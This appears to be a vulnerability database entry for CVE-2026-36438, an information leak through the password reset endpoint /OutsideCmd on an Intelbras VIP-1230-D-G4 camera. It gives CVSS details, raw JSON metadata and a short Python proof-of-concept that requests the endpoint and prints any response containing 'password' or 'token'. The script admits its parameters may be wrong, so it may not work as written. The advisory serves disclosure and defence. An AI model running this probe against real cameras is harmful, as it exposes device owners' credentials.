Security Vulnerability Report
中文
CVE-2026-36438 CVSS 5.3 MEDIUM

CVE-2026-36438

Published: 2026-05-18 16:16:30
Last Modified: 2026-05-19 14:16:42

Description

An issue in Intelbras VIP-1230-D-G4 Version V2.800.00IB00C.0.T allows a remote attacker to obtain sensitive information via password reset functionality under /OutsideCmd

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Intelbras VIP-1230-D-G4 V2.800.00IB00C.0.T

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://<target_ip>/OutsideCmd" # Send request to the vulnerable endpoint # Note: The specific parameters may vary based on the actual implementation def check_poc(ip): url = f"http://{ip}/OutsideCmd" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: response = requests.get(url, headers=headers, timeout=5) # Check if sensitive information is leaked in the response if response.status_code == 200 and ("password" in response.text.lower() or "token" in response.text.lower()): print(f"[+] Vulnerability detected at {url}") print(f"[+] Response content: {response.text[:200]}") else: print(f"[-] Vulnerability not detected or site is down.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target_ip = "192.168.1.100" # Replace with actual target IP check_poc(target_ip)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36438", "sourceIdentifier": "[email protected]", "published": "2026-05-18T16:16:29.873", "lastModified": "2026-05-19T14:16:41.783", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Intelbras VIP-1230-D-G4 Version V2.800.00IB00C.0.T allows a remote attacker to obtain sensitive information via password reset functionality under /OutsideCmd"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-640"}]}], "references": [{"url": "https://backend.intelbras.com/sites/default/files/2023-03/Datasheet%20UNIFICADO%20-%20VIP%201230%20B.D.G4-v2.pdf", "source": "[email protected]"}, {"url": "https://github.com/kensh1k/CVE-2026-36438/tree/main", "source": "[email protected]"}, {"url": "https://www.intelbras.com/pt-br/camera-dome-wi-fi-vip-1230-d-w-g4", "source": "[email protected]"}]}}